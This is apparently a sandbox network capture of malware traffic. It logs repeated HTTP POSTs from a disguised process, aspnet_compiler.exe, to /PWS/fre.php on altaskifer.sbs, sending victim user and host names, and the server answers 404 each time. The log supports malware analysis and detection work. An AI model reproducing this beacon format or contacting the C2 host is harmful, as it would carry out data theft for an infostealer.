Apr 6, 2024 09:30:28.903769016 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:29.282464981 CEST	607	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:29 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gV4tNH%2F8w05KMoxlR6UnRJL5PdWziM%2FixS2cDXbj8gpa6G6UJi%2BDOdPyCgsxvTJNr%2Bbfhd7HbRN0kCs6kFeCmvto%2B13SqGWfhxqgNMRnij95SGgFc%2FDfm0rtIt5Epe73xA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870012a24f16a548-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.6	49804	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:29.547585964 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:29.671602964 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:30.060945988 CEST	599	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:30 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1pB3vkk3DHCWOGxLgUq7X4XT4BlvMyk8ErrHQo5%2F32N4T4EbQEaqMWh4rkZNIAKmang0vD8RFaOSjOdTAZbr2icVkQpvncuYJoqCezvlGCizghOY1N7%2B6YHxxUEXJIzCvg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870012a71b51daa3-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.6	49805	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:30.339046955 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:30.463284969 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:30.831743002 CEST	603	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:30 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=agiLO4zgrf3Y6eqkI0SK2T281GUpuhlXLDCB%2F8DG25P3jLAH1%2BlCdcDZnOqc5d5qcQmG0eKJox%2B5pOcFNcuLTLLHuL8v7F0Q2m1GeWjW83SY2ohl3dQdyYbQQ3%2FcMG0fPg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870012ac0d37a4c1-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.6	49806	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:31.133120060 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:31.258110046 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:31.641822100 CEST	601	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:31 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bR%2FqdJxIlx3oW9t%2FUietnG8z0HPiyxseWMi9peiOPEBq3qXEYsojkf6srzaMGpkPpWNUIhZdsVfWoXifRjhgXHB4FU765njyqwoQeoM0d2pc%2FpKPv1TRzz2OglGzdmnFmA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870012b0fa59a4e0-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.6	49807	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:31.907018900 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:32.031678915 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:32.410543919 CEST	603	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:32 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qH7m8j4ebmoyGfDMemOeD78DUImnp6EQtsw7qsk2sYFwDBLGYBVBZexCQqQDj%2BOPc2lhJR%2B5Mi2trqx8KR%2F7J4RUVfIs3xCFBipnHbtvktNPoXyA%2ByYK47c63J3bdM0Qww%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870012b5dc9a9add-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.6	49808	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:32.673177958 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:32.797943115 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:33.166218042 CEST	607	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:33 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UTBo15iVik1TXKZthpAse090lGWcnFua%2B4KcUjlhofaUCmQPpyRjH8syy%2FZd8FwfYhbf37Wnq61BSQWGEeJ1fXzQqymj2n%2BB9UQTY%2FHCDLl1%2FXsbOunkObsm%2BJFhrKcwGg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870012ba9e26a55e-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.6	49809	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:33.437851906 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:33.561880112 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:33.930989027 CEST	605	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:33 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K7NqMYgptKHO1g6MzCQXpe4H1FfJ%2Faiy775NiBjfbX4F3rIV4AD4Ii1wLZ%2BopoHdv%2FwI3%2Bx2btKvsksCiE4NPyTRQeDhTaYybKLsjJOnUQqDOLEW2k0DyqI%2FrPqgoy74Ig%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870012bf6b8e5d10-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.6	49810	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:34.204191923 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:34.328361988 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:34.696522951 CEST	607	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:34 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PicQS5CZoBfFqiKTRBYUhxEUn%2BX9zLWkjnFwzvQGztym8D%2FM9reBGzpAbJPDn2JyHcSZ7hlhRfCMKMQpDSh%2FfH%2Bfeqvwu0RyXztdN8xb5LePoRysQmDwnwC%2FAveSM%2BMsXw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870012c42c7ddad5-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.6	49811	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:34.975531101 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:35.099447966 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:35.472255945 CEST	603	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:35 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=roue5Ty1xBVy%2Bl8kOBbrJo%2BDazr5gcbO03DB%2FWcz0dFAOq7UlsnJ4AjuyBSdHMAFpiWxEvl0erU8q1vwb0te4SWtiCgrS0TwsuwIYjpYZ3YcTJuVXM37Wax5T%2B7cHEncaw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870012c8fa785c6f-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.6	49812	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:35.733011007 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:35.856803894 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:36.246402025 CEST	603	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:36 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bFXi%2Fi11X8H091AhWvOHg%2BlvDZPyO10Kz19pSv3AqxB8m3HSPbec%2BW5%2BQYIxbKZqIiB6GBrIpCso85Qo22A6t2tz1nAL17jzcf0XSsT8SFYi3gRL6duc9vBFKH4PYLLAtA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870012cdbd5712a7-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.6	49814	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:36.516498089 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:36.640357971 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:37.034734964 CEST	603	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:36 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i%2BWeXV%2Fq2U5JM0%2BmNE3k16fRYL5k6zQfT%2F86JvwllMQje6lLFGmaOg8feVyW2BsXR9bl94YkDjc7G3Das0xwFuOxgHH7SrfFVMDmrle1luJUYn8Mwbjll2mJQtHL7QkQoQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870012d29cf60306-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.6	49815	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:37.305241108 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:37.429423094 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:37.815327883 CEST	599	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:37 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SdW0PsVramC5DARwKMyvGetN4yuyoAo75HXSW8%2BjSWp3Ulfu2wpIkSeiPUE4kL7CAdIedM0ex6aTGhBa45IgrGf5s%2FtqRAqMCUJSz9iAm2EW8UxwGKTDJChfvn6Zd9Liew%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870012d78879749b-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.6	49816	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:38.088059902 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:38.212032080 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:38.584656000 CEST	605	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:38 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JGN5aB3J04%2FyS365v6%2B4PyMsD234ZDfIjc%2F9UFLpMKb64x2cgVkGnIke3nB6cHceGgpFVw38TRBv1hm6nn7k3X4HUK6cPC60wYF43RMy1FQ5qt0F3P2Fd2%2BA8%2FpMNNjoeg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870012dc7bab67b6-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.6	49818	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:38.861510038 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:38.985732079 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:39.373178959 CEST	609	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:39 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pkgB%2FLkTH7CTZzuQih0GVx%2Bp%2Bge3J2WS1y2EgaaADG%2BSS6TKbyC4YfwGMuVquHZME%2FBfAoQ0JgIDTgDCJYq2aX0ADQKovGsITa0PNLRGcSrwpNBrOGP%2BS%2FBzo6XmqoMaAQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870012e14b099ac3-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.6	49819	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:39.686953068 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:39.811068058 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:40.186532974 CEST	609	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:40 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ccwN%2FpCdPy%2FwPKAMvwDsfiF3U7jjIhQUt8f0%2Fbvs2Jo9PaADCGqTNMvOAIpkfbbtzZhyY5YN4qneMfx2A07JA%2Bq4WtbMB18%2Ff04np%2FjdAmtUv%2FV1aclwh4H7UGOWcnyS0w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870012e66d731283-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.6	49820	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:41.966392994 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
